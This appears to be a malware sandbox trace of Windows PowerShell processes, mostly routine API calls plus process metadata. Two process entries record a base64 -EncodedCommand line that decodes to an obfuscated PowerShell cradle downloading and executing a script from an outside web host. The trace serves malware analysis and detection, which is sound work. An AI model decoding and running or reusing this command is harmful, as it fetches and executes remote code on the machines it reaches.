	[0929.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0929.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0933.060] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0933.060] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0933.060] CoTaskMemFree (pv=0x503520) 
	[0934.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0934.218] SetErrorMode (uMode=0x1) returned 0x1
	[0934.218] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x24dc20 | out: lpFileInformation=0x24dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0934.218] SetErrorMode (uMode=0x1) returned 0x1
	[0963.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.828] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0963.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.828] CoTaskMemFree (pv=0x503520) 
	[0963.831] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0963.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.831] CoTaskMemFree (pv=0x503520) 
	[0963.831] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0963.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.831] CoTaskMemFree (pv=0x503520) 
	[0963.834] CoCreateGuid (in: pguid=0x24dfe8 | out: pguid=0x24dfe8*(Data1=0xd953fbf1, Data2=0x5ad, Data3=0x499b, Data4=([0]=0x8e, [1]=0x61, [2]=0x21, [3]=0xb3, [4]=0xf1, [5]=0x94, [6]=0xd8, [7]=0xfe))) returned 0x0
	[0963.837] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0963.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.837] CoTaskMemFree (pv=0x503520) 
	[0963.840] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0963.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.840] CoTaskMemFree (pv=0x503520) 
	[0963.842] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0963.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.842] CoTaskMemFree (pv=0x503520) 
	[0963.858] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0964.248] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x24dc90 | out: lpConsoleScreenBufferInfo=0x24dc90) returned 1
	[0964.266] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0964.267] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x24dc90 | out: lpConsoleScreenBufferInfo=0x24dc90) returned 1
	[0964.268] GetVersionExW (in: lpVersionInformation=0x24dc20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dc20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0964.271] GetCurrentProcess () returned 0xffffffffffffffff
	[0964.272] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x24dcb8 | out: TokenHandle=0x24dcb8*=0x2a4) returned 1
	[0964.276] GetTokenInformation (in: TokenHandle=0x2a4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24dbd8 | out: TokenInformation=0x0, ReturnLength=0x24dbd8) returned 0
	[0964.277] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4c33b0
	[0964.277] GetTokenInformation (in: TokenHandle=0x2a4, TokenInformationClass=0x8, TokenInformation=0x4c33b0, TokenInformationLength=0x4, ReturnLength=0x24dbd8 | out: TokenInformation=0x4c33b0, ReturnLength=0x24dbd8) returned 1
	[0964.277] DuplicateTokenEx (in: hExistingToken=0x2a4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x24dd38 | out: phNewToken=0x24dd38*=0x2dc) returned 1
	[0964.278] GetTokenInformation (in: TokenHandle=0x2a4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24dbd8 | out: TokenInformation=0x0, ReturnLength=0x24dbd8) returned 0
	[0964.278] GetTokenInformation (in: TokenHandle=0x2a4, TokenInformationClass=0x8, TokenInformation=0x4c33e0, TokenInformationLength=0x4, ReturnLength=0x24dbd8 | out: TokenInformation=0x4c33e0, ReturnLength=0x24dbd8) returned 1
	[0964.278] CheckTokenMembership (in: TokenHandle=0x2dc, SidToCheck=0x2fddcf0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x24dd48 | out: IsMember=0x24dd48) returned 1
	[0964.278] CloseHandle (hObject=0x2dc) returned 1
	[0964.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.705] CoTaskMemAlloc (cb=0x804) returned 0x52e600
	[0964.705] GetConsoleTitleW (in: lpConsoleTitle=0x52e600, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0964.706] CoTaskMemFree (pv=0x52e600) 
	[0965.111] CoTaskMemAlloc (cb=0x804) returned 0x52eeb0
	[0965.111] GetConsoleTitleW (in: lpConsoleTitle=0x52eeb0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0965.111] CoTaskMemFree (pv=0x52eeb0) 
	[0965.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.114] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0965.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.551] SetConsoleCtrlHandler (HandlerRoutine=0x29868dc, Add=1) returned 1
	[0965.915] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2e8
	[0965.917] CoCreateGuid (in: pguid=0x24de30 | out: pguid=0x24de30*(Data1=0x87c864b4, Data2=0xe156, Data3=0x4130, Data4=([0]=0xb5, [1]=0x57, [2]=0xb6, [3]=0xce, [4]=0xa1, [5]=0xe3, [6]=0x28, [7]=0x73))) returned 0x0
	[0965.919] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0965.919] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.919] CoTaskMemFree (pv=0x503520) 
	[0966.612] WinSqmIsOptedIn () returned 0x0
	[0966.613] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0966.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.613] CoTaskMemFree (pv=0x503520) 
	[0966.614] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0966.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.614] CoTaskMemFree (pv=0x503520) 
	[0967.556] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0967.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.556] CoTaskMemFree (pv=0x503520) 
	[0967.557] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0967.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.557] CoTaskMemFree (pv=0x503520) 
	[0967.558] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0967.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.558] CoTaskMemFree (pv=0x503520) 
	[0968.968] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0968.968] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.968] CoTaskMemFree (pv=0x503520) 
	[0968.969] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0968.969] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.969] CoTaskMemFree (pv=0x503520) 
	[0968.969] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0968.969] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.969] CoTaskMemFree (pv=0x503520) 
	[0968.978] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0968.978] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.978] CoTaskMemFree (pv=0x503520) 
	[0970.287] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0970.287] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.287] CoTaskMemFree (pv=0x503520) 
	[0970.291] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0970.291] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.291] CoTaskMemFree (pv=0x503520) 
	[0970.292] CoTaskMemAlloc (cb=0x104) returned 0x503520
	[0970.292] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.292] CoTaskMemFree (pv=0x503520) 

Thread:
	id = 637
	os_tid = 0x1420


Thread:
	id = 652
	os_tid = 0x1460


Thread:
	id = 1358
	os_tid = 0x1edc


Thread:
	id = 1367
	os_tid = 0x1f1c


Thread:
	id = 1483
	os_tid = 0x1eac


Thread:
	id = 1566
	os_tid = 0x20d4


Thread:
	id = 1642
	os_tid = 0x226c


Thread:
	id = 1643
	os_tid = 0x2270

	[0824.859] CoGetContextToken (in: pToken=0x1b59ef90 | out: pToken=0x1b59ef90) returned 0x0
	[0824.860] CObjectContext::QueryInterface () returned 0x0
	[0824.860] CObjectContext::GetCurrentThreadType () returned 0x0
	[0824.860] Release () returned 0x0
	[0824.860] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Thread:
	id = 2090
	os_tid = 0x1f44


Process:
	id = "110"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6c239000"
	os_pid = "0xc10"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "23"
	os_parent_pid = "0x3b0"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 573
	os_tid = 0x1110


Thread:
	id = 584
	os_tid = 0xcf8


Thread:
	id = 587
	os_tid = 0x4bc


Process:
	id = "111"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x64608000"
	os_pid = "0x114c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 580
	os_tid = 0x1178

	[0551.846] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0559.942] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0559.943] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0559.943] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0559.943] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
